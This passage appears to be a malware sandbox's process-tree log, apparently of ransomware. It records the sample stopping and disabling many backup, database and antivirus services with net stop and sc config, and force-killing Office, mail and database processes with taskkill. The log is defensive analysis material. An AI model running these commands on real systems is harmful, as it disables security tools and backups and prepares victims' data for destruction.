  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:3660
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:8828
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:3732
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:8880
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:3720
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:8800
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:3740
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:8744
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:3752
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:8960
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:3772
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:7024
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:3788
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:8736
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:3812
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:8836
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:3856
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:8792
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:3848
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:8972
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:3840
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:8216
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:3832
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:8916
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:3804
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:9028
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:3884
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:1100
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:3904
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:5632
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:3796
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:8784
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:4040
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:3548
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:4024
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:2260
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:4088
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:8516
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:2144
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:8576
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:3160
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:2704
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:1268
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:8592
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:2536
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:3344
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:9172
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:3592
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:4620
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:3520
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:9188
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:3540
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:8556
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:4100
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:8652
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:4108
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:8584
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:3976
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:8612
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:4144
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:8644
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:4136
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:2060
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:4128
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:8624
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:4192
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:8680
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:8852
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:4316
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:8728
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:4348
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:8872
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:4332
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:8924
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:4364
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:8720
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:4372
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:2088
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:4424
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:9068
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:4416
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:9108
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:4408
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:9076
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:4448
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:3456
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:4472
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:9084
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:4464
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:2212
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:4516
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:3500
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:4532
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:2024
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:4524
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sms_site_sql_backup /y
    3⤵
    PID:9120
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:4504
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:9180
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:4608
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:572
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:4600
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:2244
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:4592
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:2112
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:4740
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:2832
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:4752
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:3448
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:4732
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:3492
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:4772
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:2140
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:4820
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:2552
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:4836
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:2068
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:4828
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:2152
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:4900
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:4000
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:4892
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:2264
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:4884
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:9212
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:4924
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:2128
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:4932
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:2236
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:4916
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:3508
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:4964
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:8844
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:4980
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:3828
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:1580
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:3484
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:4996
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:2540
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:5036
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:2232
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:5060
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:4296
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:5052
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:3020
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:5044
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:1768
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:5016
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:5744
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:5072
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:2380
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:5080
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:2352
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:5092
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:2872
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5100
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4656
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:3168
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:4564
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:3084
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:2780
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:4076
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:3768
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:4012
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:744
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:4304
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:2172
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:4280
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:1640
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:4232
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:2324
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:4328
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:6616
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:4396
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:2916
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:4648
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:2336
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:2436
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:2132
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.28
  2⤵
  PID:2432
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp5E94.bat
  2⤵
  PID:1616
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:1244
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
    3⤵
    PID:304
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:1724
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:2440
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:5740
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:1308
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop vapiendpoint /y
    3⤵
    PID:2328
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:4992
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5140
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5156
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:5148
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5228
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5220
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4812
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5332
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5324
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5316
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5300
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5272
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5264
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5256
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5396
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5404
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5388
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5380
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5372
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5432
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5536
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5520
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5512
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5504
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5560
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5552
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:5544
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5612
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5604
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5596
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5588
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5656
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5664
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5648
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5712
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5700
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5720
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5796
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5788
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5780
- C:\Windows\SysWOW64\taskkill.exe
